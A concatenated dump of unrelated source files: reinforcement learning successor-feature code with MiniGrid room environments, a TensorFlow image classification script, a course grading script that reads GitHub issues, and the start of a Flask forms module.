dsr_matrix = dsr.mean(axis=mean_axes)
dsr_matrix = dsr_matrix / np.linalg.norm(dsr_matrix, ord=2, axis=3, keepdims=True)
subgoal_dsr = dsr_matrix[subgoal].mean(axis=0)
q_values = np.dot(dsr_matrix, subgoal_dsr)
return q_values
@torch.no_grad()
def get_tsne(self, env, representation, mean_axes=(2, 3)):
h, w = env.grid.height, env.grid.width
representation = representation.detach().numpy()
representation_matrix = np.nanmean(representation, axis=mean_axes)
valid_representations = representation_matrix.reshape(h * w, -1)
walls = np.isnan(valid_representations).any(axis=1)
valid_representations = valid_representations[~walls]
embeddings = TSNE(n_components=2).fit_transform(valid_representations)
rooms = np.zeros((h, w))
if hasattr(env, 'rooms'):
for i, room in enumerate(env.rooms, 1):
start_x, start_y = room.top
size_x, size_y = room.size
for x in range(start_x + 1, start_x + size_x - 1):
for y in range(start_y + 1, start_y + size_y - 1):
rooms[x, y] = i
rooms = rooms.reshape(h * w)[~walls]
return embeddings, rooms
def train_mode(self, itr):
super().train_mode(itr)
self.feature_model.train()
def sample_mode(self, itr):
super().sample_mode(itr)
self.feature_model.eval()
def eval_mode(self, itr):
super().eval_mode(itr)
self.feature_model.eval()
class IDFDSRAgent:
def __init__(self):
self.featureModelCls = IDFModel
def inverse_dynamics(self, observation, next_observation):
model_inputs = buffer_to(observation,
device=self.device)
features = self.feature_model(model_inputs, mode='encode')
model_inputs = buffer_to(next_observation,
device=self.device)
next_features = self.feature_model(model_inputs, mode='encode')
model_inputs = buffer_to((features, next_features),
device=self.device)
pred_actions = self.feature_model(*model_inputs, mode='inverse')
return pred_actions.cpu()
class TCFDSRAgent:
def __init__(self):
self.featureModelCls = TCFModel
```
#### File: agents/dqn/mixin.py
```python
class Mixin:
def make_env_to_model_kwargs(self, env_spaces):
return dict(image_shape=env_spaces.observation.shape,
output_size=env_spaces.action.n)
```
#### File: dqn/dsr/action_dsr.py
```python
from collections import namedtuple
import torch
import torch.nn as nn
from rlpyt.algos.dqn.dsr.dsr import DSR
from rlpyt.algos.utils import valid_from_done
from rlpyt.utils.tensor import select_at_indexes, valid_mean
OptInfo = namedtuple("OptInfo", ["dsrLoss", "dsrGradNorm", "tdAbsErr"])
class ActionDSR(DSR):
"""Action DSR."""
def __init__(self, **kwargs):
super().__init__(**kwargs)
def dsr_loss(self, samples):
"""Samples have leading batch dimension [B,..] (but not time)."""
# 1a. encode observations in feature space
with torch.no_grad():
features = self.agent.encode(samples.agent_inputs.observation)
features = select_at_indexes(samples.action[:, 0], features)
# 1b. estimate successor features given features
s_features = self.agent(features)
with torch.no_grad():
# 2a. encode target observations in feature space
target_features = self.agent.encode(samples.target_inputs.observation)
next_a = torch.randint(high=target_features.shape[1], size=samples.action[:, 0].shape)
target_features = select_at_indexes(next_a, target_features)
# 2b. estimate target successor features given features
target_s_features = self.agent.target(target_features)
# 3. combine current features + discounted target successor features
disc_target_s_features = (self.discount ** self.n_step_return) * target_s_features
y = features + (1 - samples.done_n.float()).view(-1, 1) * disc_target_s_features
delta = y - s_features
losses = 0.5 * delta ** 2
abs_delta = abs(delta)
if self.delta_clip is not None: # Huber loss.
b = self.delta_clip * (abs_delta - self.delta_clip / 2)
losses = torch.where(abs_delta <= self.delta_clip, losses, b)
# if self.prioritized_replay:
# losses *= samples.is_weights
# sum losses over feature vector such that each sample has a scalar loss (result: B x 1)
# losses = losses.sum(dim=1)
td_abs_errors = abs_delta.detach()
if self.delta_clip is not None:
td_abs_errors = torch.clamp(td_abs_errors, 0, self.delta_clip)
if not self.mid_batch_reset:
valid = valid_from_done(samples.done)
loss = valid_mean(losses, valid)
td_abs_errors *= valid
else:
loss = torch.mean(losses)
return loss, td_abs_errors
```
#### File: dqn/dsr/feature_dsr.py
```python
from collections import namedtuple
import torch
import torch.nn as nn
from rlpyt.algos.dqn.dsr.dsr import DSR
from rlpyt.replays.non_sequence.uniform import (UniformReplayBuffer,
AsyncUniformReplayBuffer, LandmarkUniformReplayBuffer,
UniformTripletReplayBuffer)
from rlpyt.utils.collections import namedarraytuple
from rlpyt.utils.logging import logger
from rlpyt.utils.misc import param_norm_
from rlpyt.utils.quick_args import save__init__args
from rlpyt.utils.tensor import select_at_indexes, valid_mean
from rlpyt.algos.utils import valid_from_done
FeatureOptInfo = namedtuple("FeateureOptInfo", ["featureLoss", "featureGradNorm",
"dsrLoss", "dsrGradNorm", "tdAbsErr"])
class FeatureDSR(DSR):
"""Feature-based DSR."""
def __init__(
self,
feature_learning_rate=2.5e4,
max_steps_feature_learn=None,
min_steps_dsr_learn=int(5e4),
**kwargs):
super().__init__(**kwargs)
save__init__args(locals())
def initialize(self, agent, n_itr, batch_spec, mid_batch_reset, examples,
world_size=1, rank=0):
super().initialize(agent, n_itr, batch_spec, mid_batch_reset, examples,
world_size, rank)
if self.max_steps_feature_learn is not None:
self.max_itr_feature_learn = int(self.max_steps_feature_learn // self.sampler_bs)
else:
self.max_itr_feature_learn = None
self.min_itr_dsr_learn = int(self.min_steps_dsr_learn // self.sampler_bs)
def optim_initialize(self, rank=0):
"""Called by async runner."""
self.rank = rank
self.dsr_optimizer = self.OptimCls(self.agent.dsr_parameters(),
lr=self.learning_rate, **self.optim_kwargs)
self.feature_optimizer = self.OptimCls(self.agent.feature_parameters(),
lr=self.feature_learning_rate, **self.optim_kwargs)
if self.initial_optim_state_dict is not None:
self.dsr_optimizer.load_state_dict(self.initial_optim_state_dict['dsr'])
self.feature_optimizer.load_state_dict(self.initial_optim_state_dict['feature'])
# if self.prioritized_replay:
# self.pri_beta_itr = max(1, self.pri_beta_steps // self.sampler_bs)
def initialize_replay_buffer(self, examples, batch_spec, async_=False):
super().initialize_replay_buffer(examples, batch_spec, async_)
self.feature_replay_buffer = None
def optim_state_dict(self):
"""If carrying multiple optimizers, overwrite to return dict state_dicts."""
return {'dsr': self.dsr_optimizer.state_dict(),
'feature': self.feature_optimizer.state_dict()}
def append_feature_samples(self, samples=None):
# Append samples to replay buffer used for training feature representation only
if samples is not None and self.feature_replay_buffer is not None:
samples_to_buffer = self.samples_to_buffer(samples)
self.feature_replay_buffer.append_samples(samples_to_buffer)
def append_dsr_samples(self, samples=None):
# Append samples to replay buffer used for training successor features
if samples is not None:
samples_to_buffer = self.samples_to_buffer(samples)
self.replay_buffer.append_samples(samples_to_buffer)
def optimize_agent(self, itr, sampler_itr=None):
itr = itr if sampler_itr is None else sampler_itr # Async uses sampler_itr.
opt_info = self.opt_info_class(*([] for _ in range(len(self.opt_info_class._fields))))
if itr < self.min_itr_learn:
# Not enough samples have been collected
return opt_info
for _ in range(self.updates_per_optimize):
samples_from_replay = self.replay_buffer.sample_batch(self.batch_size)
if self.max_itr_feature_learn is None or itr < self.max_itr_feature_learn:
# Train feature representation
if self.feature_replay_buffer:
feature_samples_from_replay = self.feature_replay_buffer.sample_batch(self.batch_size)
else:
feature_samples_from_replay = samples_from_replay
self.feature_optimizer.zero_grad()
feature_loss, feature_opt_info = self.feature_loss(feature_samples_from_replay)
feature_loss.backward()
feature_grad_norm = torch.nn.utils.clip_grad_norm_(
self.agent.feature_parameters(), self.clip_grad_norm)
self.feature_optimizer.step()
opt_info.featureLoss.append(feature_loss.item())
opt_info.featureGradNorm.append(feature_grad_norm)
for key, value in feature_opt_info.items():
getattr(opt_info, key).append(value)
if itr >= self.min_itr_dsr_learn:
# Train successor feature representation
self.dsr_optimizer.zero_grad()
dsr_loss, td_abs_errors = self.dsr_loss(samples_from_replay)
dsr_loss.backward()
dsr_grad_norm = torch.nn.utils.clip_grad_norm_(
self.agent.dsr_parameters(), self.clip_grad_norm)
self.dsr_optimizer.step()
opt_info.dsrLoss.append(dsr_loss.item())
opt_info.dsrGradNorm.append(dsr_grad_norm)
opt_info.tdAbsErr.extend(td_abs_errors[::8].numpy()) # Downsample.
self.update_counter += 1
if self.update_counter % self.target_update_interval == 0:
self.agent.update_target()
self.update_itr_hyperparams(itr)
return opt_info
def feature_loss(self, samples_from_replay):
raise NotImplementedError
IDFOptInfo = namedtuple("IDFOptInfo", ["idfAccuracy"] + list(FeatureOptInfo._fields))
class IDFDSR(FeatureDSR):
"""Inverse Dynamics Features DSR."""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.opt_info_class = IDFOptInfo
self.opt_info_fields = tuple(f for f in self.opt_info_class._fields)
self.cross_entropy_loss = nn.CrossEntropyLoss()
def feature_loss(self, samples):
# Inverse dynamics prediction loss
pred_actions = self.agent.inverse_dynamics(samples.agent_inputs.observation,
samples.target_inputs.observation)
loss = self.cross_entropy_loss(pred_actions, samples.action)
with torch.no_grad():
accuracy = ((pred_actions.argmax(dim=1) == samples.action).sum().float() / samples.action.shape[0]) * 100
feature_opt_info = {'idfAccuracy': accuracy.item()}
return loss, feature_opt_info
TCFOptInfo = namedtuple("TCFOptInfo", ["posDistance", "negDistance"] + list(FeatureOptInfo._fields))
SamplesToBuffer = namedarraytuple("SamplesToBuffer",
["observation", "action", "reward", "done", "mode"])
class LandmarkTCFDSR(FeatureDSR):
"""Time Contrastive Features DSR."""
def __init__(
self,
pos_threshold=3,
neg_close_threshold=15,
neg_far_threshold=30,
margin=2.0,
**kwargs):
save__init__args(locals())
super().__init__(**kwargs)
self.opt_info_class = TCFOptInfo
self.opt_info_fields = tuple(f for f in self.opt_info_class._fields)
def initialize(self, agent, n_itr, batch_spec, mid_batch_reset, examples,
world_size=1, rank=0):
super().initialize(agent, n_itr, batch_spec, mid_batch_reset, examples,
world_size, rank)
self.initialize_triplet_replay_buffer(examples, batch_spec)
def initialize_replay_buffer(self, examples, batch_spec, async_=False):
example_to_buffer = SamplesToBuffer(
observation=examples["observation"],
action=examples["action"],
reward=examples["reward"],
done=examples["done"],
mode=examples["agent_info"].mode,
)
replay_kwargs = dict(
example=example_to_buffer,
size=self.replay_size,
B=batch_spec.B,
discount=self.discount,
n_step_return=self.n_step_return,
)
# if self.prioritized_replay:
# replay_kwargs.update(dict(
# alpha=self.pri_alpha,
# beta=self.pri_beta_init,
# default_priority=self.default_priority,
# ))
# ReplayCls = (AsyncPrioritizedReplayFrameBuffer if async_ else
# PrioritizedReplayFrameBuffer)
# else:
# ReplayCls = (AsyncUniformReplayFrameBuffer if async_ else
# UniformReplayFrameBuffer)
ReplayCls = (AsyncUniformReplayBuffer if async_ else
LandmarkUniformReplayBuffer)
self.replay_buffer = ReplayCls(**replay_kwargs)
self.feature_replay_buffer = None
def initialize_triplet_replay_buffer(self, examples, batch_spec, async_=False):
example_to_buffer = SamplesToBuffer(
observation=examples["observation"],
action=examples["action"],
reward=examples["reward"],
done=examples["done"],
mode=examples["agent_info"].mode,
)
triplet_replay_kwargs = dict(
example=example_to_buffer,
size=self.replay_size,
B=batch_spec.B,
pos_threshold=self.pos_threshold,
neg_close_threshold=self.neg_close_threshold,
neg_far_threshold=self.neg_far_threshold
)
self.feature_replay_buffer = UniformTripletReplayBuffer(**triplet_replay_kwargs)
def samples_to_buffer(self, samples):
return SamplesToBuffer(
observation=samples.env.observation,
action=samples.agent.action,
reward=samples.env.reward,
done=samples.env.done,
mode=samples.agent.agent_info.mode
)
def feature_loss(self, samples):
# Time contrastive loss
anchor_embeddings = self.agent.encode(samples.anchor)
pos_embeddings = self.agent.encode(samples.pos)
neg_embeddings = self.agent.encode(samples.neg)
pos_dist = torch.norm(anchor_embeddings - pos_embeddings, p=2, dim=1)
neg_dist = torch.norm(anchor_embeddings - neg_embeddings, p=2, dim=1)
loss = torch.clamp(self.margin + pos_dist - neg_dist, min=0.0).mean()
with torch.no_grad():
feature_opt_info = {"posDistance": pos_dist.mean().item(),
"negDistance": neg_dist.mean().item()}
return loss, feature_opt_info
def dsr_loss(self, samples):
"""Samples have leading batch dimension [B,..] (but not time)."""
# 1a. encode observations in feature space
with torch.no_grad():
features = self.agent.encode(samples.agent_inputs.observation)
# 1b. estimate successor features given features
dsr = self.agent(features)
s_features = select_at_indexes(samples.action, dsr)
with torch.no_grad():
# 2a. encode target observations in feature space
target_features = self.agent.encode(samples.target_inputs.observation)
# 2b. estimate target successor features given features
target_dsr = self.agent.target(target_features)
# next_qs = self.agent.q_estimate(target_dsr)
# next_a = torch.argmax(next_qs, dim=-1)
# random actions
next_a = torch.randint(high=target_dsr.shape[1], size=samples.action.shape)
target_s_features = select_at_indexes(next_a, target_dsr)
# 3. combine current features + discounted target successor features
done_n = samples.done_n.float().view(-1, 1)
disc_target_s_features = (self.discount ** self.n_step_return) * target_s_features
s_y = target_features + (1 - samples.target_done.float()).view(-1, 1) * disc_target_s_features
y = features * done_n + (1 - done_n) * s_y
delta = y - s_features
losses = 0.5 * delta ** 2
abs_delta = abs(delta)
if self.delta_clip is not None: # Huber loss.
b = self.delta_clip * (abs_delta - self.delta_clip / 2)
losses = torch.where(abs_delta <= self.delta_clip, losses, b)
# if self.prioritized_replay:
# losses *= samples.is_weights
# sum losses over feature vector such that each sample has a scalar loss (result: B x 1)
# losses = losses.sum(dim=1)
td_abs_errors = abs_delta.mean(axis=1).detach()
if self.delta_clip is not None:
td_abs_errors = torch.clamp(td_abs_errors, 0, self.delta_clip)
if not self.mid_batch_reset:
losses = torch.mean(losses, axis=1)
valid = valid_from_done(samples.done)
loss = valid_mean(losses, valid)
td_abs_errors *= valid
else:
loss = torch.mean(losses)
return loss, td_abs_errors
```
#### File: rlpyt/envs/minigrid.py
```python
from gym_minigrid.minigrid import *
class FourRooms(MiniGridEnv):
"""
Classic 4 rooms gridworld environment.
Can specify agent and goal position, if not it set at random.
"""
def __init__(self, start_pos=None, goal_pos=None, max_steps=100):
self._agent_default_pos = start_pos
self._goal_default_pos = goal_pos
self.start_pos = start_pos
self.goal_pos = goal_pos
super().__init__(grid_size=13, max_steps=max_steps)
def _gen_grid(self, width, height):
# Create the grid
self.grid = Grid(width, height)
# Generate the surrounding walls
self.grid.horz_wall(0, 0)
self.grid.horz_wall(0, height - 1)
self.grid.vert_wall(0, 0)
self.grid.vert_wall(width - 1, 0)
room_w = width // 2
room_h = height // 2
# For each row of rooms
for j in range(0, 2):
# For each column
for i in range(0, 2):
xL = i * room_w
yT = j * room_h
xR = xL + room_w
yB = yT + room_h
# Bottom wall and door
if i + 1 < 2:
self.grid.vert_wall(xR, yT, room_h)
# pos = (xR, self._rand_int(yT + 1, yB))
# self.grid.set(*pos, None)
# Bottom wall and door
if j + 1 < 2:
if i == 1:
yB += 1
self.grid.horz_wall(xL, yB, room_w)
# pos = (self._rand_int(xL + 1, xR), yB)
# self.grid.set(*pos, None)
for pos in [(6, 3), (2, 6), (9, 7), (6, 10)]:
self.grid.set(*pos, None)
# Randomize the player start position and orientation
if self._agent_default_pos is not None:
self.agent_pos = self._agent_default_pos
self.grid.set(*self._agent_default_pos, None)
self.agent_dir = self._rand_int(0, 4) # assuming random start direction
else:
self.place_agent()
if self._goal_default_pos is not None:
goal = Goal()
self.put_obj(goal, *self._goal_default_pos)
goal.init_pos, goal.cur_pos = self._goal_default_pos
else:
self.place_obj(Goal())
self.mission = 'Reach the goal'
def step(self, action):
obs, reward, done, info = MiniGridEnv.step(self, action)
return obs, reward, done, info
class Room:
def __init__(self,
top,
size,
entryDoorPos,
exitDoorPos
):
self.top = top
self.size = size
self.entryDoorPos = entryDoorPos
self.exitDoorPos = exitDoorPos
class MultiRoom(MiniGridEnv):
"""
Environment with multiple rooms (subgoals)
"""
def __init__(self,
minNumRooms,
maxNumRooms,
maxRoomSize=10,
gridSize=25
):
assert minNumRooms > 0
assert maxNumRooms >= minNumRooms
assert maxRoomSize >= 4
self.minNumRooms = minNumRooms
self.maxNumRooms = maxNumRooms
self.maxRoomSize = maxRoomSize
self.rooms = []
super(MultiRoom, self).__init__(
grid_size=gridSize,
max_steps=self.maxNumRooms * 20
)
def _gen_grid(self, width, height):
roomList = []
# Choose a random number of rooms to generate
numRooms = self._rand_int(self.minNumRooms, self.maxNumRooms+1)
while len(roomList) < numRooms:
curRoomList = []
entryDoorPos = (
self._rand_int(0, width - 2),
self._rand_int(0, width - 2)
)
# Recursively place the rooms
self._placeRoom(
numRooms,
roomList=curRoomList,
minSz=4,
maxSz=self.maxRoomSize,
entryDoorWall=2,
entryDoorPos=entryDoorPos
)
if len(curRoomList) > len(roomList):
roomList = curRoomList
# Store the list of rooms in this environment
assert len(roomList) > 0
self.rooms = roomList
# Create the grid
self.grid = Grid(width, height)
wall = Wall()
prevDoorColor = None
# For each room
for idx, room in enumerate(roomList):
topX, topY = room.top
sizeX, sizeY = room.size
# Draw the top and bottom walls
for i in range(0, sizeX):
self.grid.set(topX + i, topY, wall)
self.grid.set(topX + i, topY + sizeY - 1, wall)
# Draw the left and right walls
for j in range(0, sizeY):
self.grid.set(topX, topY + j, wall)
self.grid.set(topX + sizeX - 1, topY + j, wall)
# If this isn't the first room, place the entry door
if idx > 0:
# Pick a door color different from the previous one
doorColors = set(COLOR_NAMES)
if prevDoorColor:
doorColors.remove(prevDoorColor)
# Note: the use of sorting here guarantees determinism,
# This is needed because Python's set is not deterministic
doorColor = self._rand_elem(sorted(doorColors))
entryDoor = Door(doorColor)
self.grid.set(*room.entryDoorPos, entryDoor)
prevDoorColor = doorColor
prevRoom = roomList[idx-1]
prevRoom.exitDoorPos = room.entryDoorPos
# Randomize the starting agent position and direction
self.place_agent(roomList[0].top, roomList[0].size)
# Place the final goal in the last room
self.goal_pos = self.place_obj(Goal(), roomList[-1].top, roomList[-1].size)
self.mission = 'traverse the rooms to get to the goal'
def _placeRoom(
self,
numLeft,
roomList,
minSz,
maxSz,
entryDoorWall,
entryDoorPos
):
# Choose the room size randomly
sizeX = self._rand_int(minSz, maxSz+1)
sizeY = self._rand_int(minSz, maxSz+1)
# The first room will be at the door position
if len(roomList) == 0:
topX, topY = entryDoorPos
# Entry on the right
elif entryDoorWall == 0:
topX = entryDoorPos[0] - sizeX + 1
y = entryDoorPos[1]
topY = self._rand_int(y - sizeY + 2, y)
# Entry wall on the south
elif entryDoorWall == 1:
x = entryDoorPos[0]
topX = self._rand_int(x - sizeX + 2, x)
topY = entryDoorPos[1] - sizeY + 1
# Entry wall on the left
elif entryDoorWall == 2:
topX = entryDoorPos[0]
y = entryDoorPos[1]
topY = self._rand_int(y - sizeY + 2, y)
# Entry wall on the top
elif entryDoorWall == 3:
x = entryDoorPos[0]
topX = self._rand_int(x - sizeX + 2, x)
topY = entryDoorPos[1]
else:
assert False, entryDoorWall
# If the room is out of the grid, can't place a room here
if topX < 0 or topY < 0:
return False
if topX + sizeX > self.width or topY + sizeY >= self.height:
return False
# If the room intersects with previous rooms, can't place it here
for room in roomList[:-1]:
nonOverlap = \
topX + sizeX < room.top[0] or \
room.top[0] + room.size[0] <= topX or \
topY + sizeY < room.top[1] or \
room.top[1] + room.size[1] <= topY
if not nonOverlap:
return False
# Add this room to the list
roomList.append(Room(
(topX, topY),
(sizeX, sizeY),
entryDoorPos,
None
))
# If this was the last room, stop
if numLeft == 1:
return True
# Try placing the next room
for i in range(0, 8):
# Pick which wall to place the out door on
wallSet = set((0, 1, 2, 3))
wallSet.remove(entryDoorWall)
exitDoorWall = self._rand_elem(sorted(wallSet))
nextEntryWall = (exitDoorWall + 2) % 4
# Pick the exit door position
# Exit on right wall
if exitDoorWall == 0:
exitDoorPos = (
topX + sizeX - 1,
topY + self._rand_int(1, sizeY - 1)
)
# Exit on south wall
elif exitDoorWall == 1:
exitDoorPos = (
topX + self._rand_int(1, sizeX - 1),
topY + sizeY - 1
)
# Exit on left wall
elif exitDoorWall == 2:
exitDoorPos = (
topX,
topY + self._rand_int(1, sizeY - 1)
)
# Exit on north wall
elif exitDoorWall == 3:
exitDoorPos = (
topX + self._rand_int(1, sizeX - 1),
topY
)
else:
assert False
# Recursively create the other rooms
success = self._placeRoom(
numLeft - 1,
roomList=roomList,
minSz=minSz,
maxSz=maxSz,
entryDoorWall=nextEntryWall,
entryDoorPos=exitDoorPos
)
if success:
break
return True
```
#### File: dqn/dsr/idf_model.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from rlpyt.utils.tensor import infer_leading_dims, restore_leading_dims
from rlpyt.models.mlp import MlpModel
from rlpyt.models.utils import FUNCTION_MAP, Reshape
class IDFModel(torch.nn.Module):
def __init__(
self,
image_shape,
output_size,
feature_size=64
):
super().__init__()
h, w, c = image_shape
self.output_size = output_size
self.feature_size = feature_size
conv_embedding_size = 16 * (((h - 3) // 2) - 1) ** 2
self.encoder = nn.Sequential(
nn.Conv2d(c, 16, (3, 3), stride=2),
nn.ReLU(),
nn.Conv2d(16, 16, (3, 3), stride=1),
nn.ReLU(),
nn.Flatten(),
nn.Linear(conv_embedding_size, self.feature_size)
)
self.inverse = nn.Sequential(
nn.Linear(feature_size * 2, self.output_size)
)
def forward(self, obs, next_obs=None, mode='inverse'):
x = obs.type(torch.float)
if mode == 'inverse':
next_x = next_obs.type(torch.float)
return self.inverse(torch.cat((x, next_x), dim=1))
elif mode == 'encode':
x = x.permute(0, 3, 1, 2)
return self.encoder(x)
else:
raise ValueError('Invalid mode!')
``` |
{
"source": "2016gary/RealTimeIR",
"score": 3
} |
#### File: RealTimeIR/Python/predict.py
```python
from skimage import io, transform
import glob
import tensorflow as tf
import numpy as np
path = 'E:/RealTimeIR/predict/'
# 将所有的图片resize成128*128
w = 100
h = 100
c = 3
# 读取图片
def read_img(path):
imgs = []
for im in glob.glob(path + '*.jpg'):
img = io.imread(im)
img = transform.resize(img, (w, h, c), mode="reflect")
imgs.append(img)
return np.asarray(imgs, np.float32)
# 将预测图片转为数据集
x_train = read_img(path)
# -----------------使用跟模型一致的网络----------------------
x = tf.placeholder(tf.float32, shape=[None, w, h, c], name='x')
# 第一个卷积层(100->50)
# Tensorflow中padding有两种类型SAME和VALID SAME填充0使维度保持不变 VALID不填充0
conv1 = tf.layers.conv2d(
inputs=x,
filters=32,
kernel_size=[5, 5],
padding="same",
activation=tf.nn.relu,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)
# 第二个卷积层(50->25)
conv2 = tf.layers.conv2d(
inputs=pool1,
filters=64,
kernel_size=[5, 5],
padding="same",
activation=tf.nn.relu,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)
# 第三个卷积层(25->12)
conv3 = tf.layers.conv2d(
inputs=pool2,
filters=128,
kernel_size=[3, 3],
padding="same",
activation=tf.nn.relu,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
pool3 = tf.layers.max_pooling2d(inputs=conv3, pool_size=[2, 2], strides=2)
# 第四个卷积层(12->6)
conv4 = tf.layers.conv2d(
inputs=pool3,
filters=128,
kernel_size=[3, 3],
padding="same",
activation=tf.nn.relu,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
pool4 = tf.layers.max_pooling2d(inputs=conv4, pool_size=[2, 2], strides=2)
re1 = tf.reshape(pool4, [-1, 6 * 6 * 128])
# 全连接层
dense1 = tf.layers.dense(inputs=re1,
units=1024,
activation=tf.nn.relu,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),
kernel_regularizer=tf.contrib.layers.l2_regularizer(0.003))
dense2 = tf.layers.dense(inputs=dense1,
units=512,
activation=tf.nn.relu,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),
kernel_regularizer=tf.contrib.layers.l2_regularizer(0.003))
# 最后输出层使用10个神经元得到10维向量对应分类
logits = tf.layers.dense(inputs=dense2,
units=10,
activation=None,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),
kernel_regularizer=tf.contrib.layers.l2_regularizer(0.003))
# ---------------------------网络结束---------------------------
sess = tf.InteractiveSession()
# 加载模型进当前会话
saver = tf.train.Saver()
saver.restore(sess, 'E:/RealTimeIR/model/10-image-set')
# 使用模型进行预测
predictions = sess.run(tf.argmax(logits, 1), feed_dict={x: x_train})
# print("输出predictions:", predictions)
for predict in predictions:
if predict == 0:
result = "单车"
print("识别结果:单车")
elif predict == 1:
result = "书"
print("识别结果:书")
elif predict == 2:
result = "水瓶"
print("识别结果:水瓶")
elif predict == 3:
result = "汽车"
print("识别结果:汽车")
elif predict == 4:
result = "椅子"
print("识别结果:椅子")
elif predict == 5:
result = "电脑"
print("识别结果:电脑")
elif predict == 6:
result = "人脸"
print("识别结果:人脸")
elif predict == 7:
result = "鞋子"
print("识别结果:鞋子")
elif predict == 8:
result = "桌子"
print("识别结果:桌子")
elif predict == 9:
result = "树"
print("识别结果:树")
else:
result = "识别错误"
print("识别错误")
file_object = open('E:/RealTimeIR/result.txt', 'w+')
# 清空文件内容
file_object.truncate()
file_object.write(result)
file_object.close()
sess.close()
``` |
{
"source": "2016-spring-csuf-benblazak-cpsc-121/course-materials",
"score": 2
} |
#### File: 2016-spring-csuf-benblazak-cpsc-121/course-materials/grades.py
```python
import os
import os.path
import requests
import sys
from collections import OrderedDict
import github3
import common
import standards
import students
# -----------------------------------------------------------------------------
class Error(Exception):
pass
class Namespace():
pass
# -----------------------------------------------------------------------------
def _gen_grades():
filedir = os.path.dirname(os.path.abspath(__file__))
if common.DEBUG: studentdir = './test/students'
else: studentdir = '../../../students'
studentdir = os.path.abspath(os.path.join(filedir, studentdir))
assignmentsfile = os.path.join(studentdir, 'assignments.gen.py')
scandir = os.path.join(studentdir, 'scans')
# .........................................................................
name2cwid = {
v['github'].lower():k
for k,v in students.students.items()
if 'github' in v
}
grades = {
cwid: OrderedDict( [
('extra credit', 0),
('overall', None),
('predictions', OrderedDict()),
] + [
((g,s,),OrderedDict())
for g,ss in standards.groups.items()
for s in ss
] )
for cwid in students.students
}
# .........................................................................
# from github
github = github3.GitHub()
try:
for r in sorted([ r.name for r in github.iter_user_repos(common.org) ]):
if r in ( 'course-materials', ): continue
assignment = 'a' + r[-2:]
for cwid in students.students:
grades[cwid][('assignment completion', '')][assignment] = None
for pr in github.iter_repo_issues(common.org, r, state='all'):
name = pr.user.login.lower()
if name not in name2cwid: continue
grades[name2cwid[name]] \
[('assignment completion', '')] \
[assignment] = True
with open(assignmentsfile, 'w') as f:
f.write(repr({
cwid: grades[cwid][('assignment completion', '')]
for cwid in grades
}))
except (requests.exceptions.ConnectionError, github3.models.GitHubError):
print('WARNING: taking assignment grades from file', file=sys.stderr)
assignments = eval(open(assignmentsfile).read())
none = OrderedDict([
(a, None) for a in assignments[list(assignments.keys())[0]]
])
for cwid in grades:
if cwid in assignments:
grades[cwid][('assignment completion', '')] = assignments[cwid]
else:
grades[cwid][('assignment completion', '')] = none
# .........................................................................
# from scans
for d in sorted(os.listdir(scandir)):
if d.startswith('.'): continue
i = Namespace()
(i.date, i.assessment, i.standards) = d.split(',', maxsplit=2)
i.standards = [ standards.lookup(s) for s in i.standards.split(',') ]
for cwid in students.students:
for sta in i.standards:
grades[cwid][sta][i.assessment] = None
for f in os.listdir(os.path.join(scandir, d)):
if f.startswith('.'): continue
if f.startswith('_'): continue
if ',' not in f:
raise Error(
'WARNING: no comma in'
+ ' "' + os.path.join(d, f) + '"' )
(i.name, i.scores) = \
f.split('.',maxsplit=1)[0].split(',', maxsplit=1)
if len(i.scores) != len(i.standards):
raise Error(
'WARNING: mismatch in number of scores for'
+ ' "' + os.path.join(d, f) + '"' )
i.scores = [
None if s == 'x' else
3.5 if s == '5' else
3.75 if s == '7' else
int(s)
for s in i.scores
]
for sta,sco in zip(i.standards,i.scores):
try:
grades[students.lookup(i.name)][sta][i.assessment] = sco
except students.Error:
raise Error(
'Name lookup failed for '
+ ' "' + os.path.join(d, f) + '"' )
# .........................................................................
# from file
private = common.importfile(os.path.join(studentdir, 'grades.py'))
for cwid in private.grades:
if cwid in grades: grades[cwid].update(private.grades[cwid])
else: grades[cwid] = private.grades[cwid]
# .........................................................................
for cwid in grades:
overall = 0
maximum = 0
for sta,assessments in grades[cwid].items():
if isinstance(sta, str): continue
scos = [ sco for sco in assessments.values() if sco is not None ]
if sta == ('assignment completion', ''):
sco = len(scos)/len(assessments) if len(assessments) > 0 else 0
assessments['overall'] = sco
overall += sco * standards.multipliers[sta]
maximum += standards.multipliers[sta]
continue
if len(scos) == 0:
assessments['overall'] = None
else:
if len(scos) == 1 or scos[-1] >= scos[-2]:
sco = scos[-1]
else: # scos[-1] < scos[-2]
sco = [ sco for sco in [1, 2, 3, 3.5, 3.75, 4]
if (scos[-1]+scos[-2])/2 <= sco ][0]
assessments['overall'] = sco
if sco >= 3:
overall += sco / 4 * standards.multipliers[sta]
maximum += standards.multipliers[sta]
ec = grades[cwid]['extra credit'] * 0.002
if grades[cwid]['overall'] is None:
grades[cwid]['overall'] = overall + ec
grades[cwid]['predictions']['current grade'] = grades[cwid]['overall']
if maximum == 0:
grades[cwid]['predictions']['average'] = None
grades[cwid]['predictions']['maximum without reassessing'] = None
else:
grades[cwid]['predictions']['average'] = overall / maximum
grades[cwid]['predictions']['maximum without reassessing'] = \
1 - maximum + overall + ec
# .........................................................................
return grades
# -----------------------------------------------------------------------------
grades = _gen_grades()
# -----------------------------------------------------------------------------
# SECTION BEGIN letter
def letter(percent):
if percent >= 97: return 'A+'
elif percent >= 93: return 'A'
elif percent >= 90: return 'A-'
elif percent >= 87: return 'B+'
elif percent >= 83: return 'B'
elif percent >= 80: return 'B-'
elif percent >= 77: return 'C+'
elif percent >= 70: return 'C'
elif percent >= 50: return 'D'
else : return 'F'
# SECTION END letter
``` |
{
"source": "201701203/question-paper-generator",
"score": 3
} |
#### File: blueprints/courses/forms.py
```python
from flask_login import current_user
from flask_wtf import FlaskForm
from sqlalchemy import and_
from sqlalchemy import func
from sqlalchemy.sql import label
from wtforms import BooleanField
from wtforms import IntegerField
from wtforms import StringField
from wtforms import SubmitField
